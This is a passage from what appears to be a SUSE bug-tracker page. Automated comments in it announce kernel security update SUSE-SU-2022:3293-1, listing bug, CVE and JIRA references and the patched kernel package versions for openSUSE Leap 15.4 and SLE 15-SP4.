Sources used:
openSUSE Leap 15.4 (src):    kernel-azure-5.14.21-150400.14.13.1, kernel-source-azure-5.14.21-150400.14.13.1, kernel-syms-azure-5.14.21-150400.14.13.1
SUSE Linux Enterprise Module for Public Cloud 15-SP4 (src):    kernel-azure-5.14.21-150400.14.13.1, kernel-source-azure-5.14.21-150400.14.13.1, kernel-syms-azure-5.14.21-150400.14.13.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 57 Swamp Workflow Management 2022-09-16 19:27:07 UTC
SUSE-SU-2022:3293-1: An update that solves 23 vulnerabilities, contains 5 features and has 88 fixes is now available.

Category: security (important)
Bug References: 1023051,1032323,1065729,1156395,1190497,1194592,1194869,1194904,1195480,1195917,1196616,1197158,1197391,1197755,1197756,1197757,1197763,1198410,1198971,1199086,1199364,1199670,1200313,1200431,1200465,1200544,1200845,1200868,1200869,1200870,1200871,1200872,1200873,1201019,1201308,1201427,1201442,1201455,1201489,1201610,1201675,1201725,1201768,1201940,1201956,1201958,1202096,1202097,1202113,1202131,1202154,1202262,1202265,1202312,1202346,1202347,1202385,1202393,1202447,1202471,1202558,1202564,1202623,1202636,1202672,1202681,1202710,1202711,1202712,1202713,1202715,1202716,1202757,1202758,1202759,1202761,1202762,1202763,1202764,1202765,1202766,1202767,1202768,1202769,1202770,1202771,1202773,1202774,1202775,1202776,1202778,1202779,1202780,1202781,1202782,1202783,1202822,1202823,1202824,1202860,1202867,1202874,1202898,1203036,1203041,1203063,1203107,1203117,1203138,1203139,1203159
CVE References: CVE-2016-3695,CVE-2020-36516,CVE-2021-33135,CVE-2021-4037,CVE-2022-20368,CVE-2022-20369,CVE-2022-2588,CVE-2022-2639,CVE-2022-2663,CVE-2022-28356,CVE-2022-28693,CVE-2022-2873,CVE-2022-2905,CVE-2022-2938,CVE-2022-2959,CVE-2022-2977,CVE-2022-3028,CVE-2022-3078,CVE-2022-32250,CVE-2022-36879,CVE-2022-36946,CVE-2022-39188,CVE-2022-39190
JIRA References: SLE-18130,SLE-19359,SLE-20183,SLE-23766,SLE-24572
Sources used:
openSUSE Leap 15.4 (src):    dtb-aarch64-5.14.21-150400.24.21.1, kernel-64kb-5.14.21-150400.24.21.2, kernel-debug-5.14.21-150400.24.21.2, kernel-default-5.14.21-150400.24.21.2, kernel-default-base-5.14.21-150400.24.21.2.150400.24.7.2, kernel-docs-5.14.21-150400.24.21.3, kernel-kvmsmall-5.14.21-150400.24.21.2, kernel-obs-build-5.14.21-150400.24.21.2, kernel-obs-qa-5.14.21-150400.24.21.1, kernel-source-5.14.21-150400.24.21.2, kernel-syms-5.14.21-150400.24.21.1, kernel-zfcpdump-5.14.21-150400.24.21.2
SUSE Linux Enterprise Workstation Extension 15-SP4 (src):    kernel-default-5.14.21-150400.24.21.2
SUSE Linux Enterprise Module for Live Patching 15-SP4 (src):    kernel-default-5.14.21-150400.24.21.2, kernel-livepatch-SLE15-SP4_Update_3-1-150400.9.3.2
SUSE Linux Enterprise Module for Legacy Software 15-SP4 (src):    kernel-default-5.14.21-150400.24.21.2
SUSE Linux Enterprise Module for Development Tools 15-SP4 (src):    kernel-docs-5.14.21-150400.24.21.3, kernel-obs-build-5.14.21-150400.24.21.2, kernel-source-5.14.21-150400.24.21.2, kernel-syms-5.14.21-150400.24.21.1
SUSE Linux Enterprise Module for Basesystem 15-SP4 (src):    kernel-64kb-5.14.21-150400.24.21.2, kernel-default-5.14.21-150400.24.21.2, kernel-default-base-5.14.21-150400.24.21.2.150400.24.7.2, kernel-source-5.14.21-150400.24.21.2, kernel-zfcpdump-5.14.21-150400.24.21.2
SUSE Linux Enterprise High Availability 15-SP4 (src):    kernel-default-5.14.21-150400.24.21.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.